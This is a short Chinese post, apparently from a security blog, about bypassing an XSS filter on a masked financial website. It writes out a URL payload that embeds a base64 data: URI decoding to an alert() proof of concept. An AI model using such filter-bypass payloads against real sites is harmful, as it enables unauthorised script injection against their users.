之前挖到某金融网站的xss
但是困于xss filter无奈不好下手。只能在火狐下弹窗。
以下该图是我的测试。
后来发给一个Invoker哥们儿。成功给我发来payload成功绕过了XSS Filter
http://www.xxx.com/news.asp?lx=7&page=1%3Ca%20href=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdGZvcmZ1biEnKTwvc2NyaXB0Pg==%22%3Eclick%3Ca%3E
得研究此绕过之法。
THE END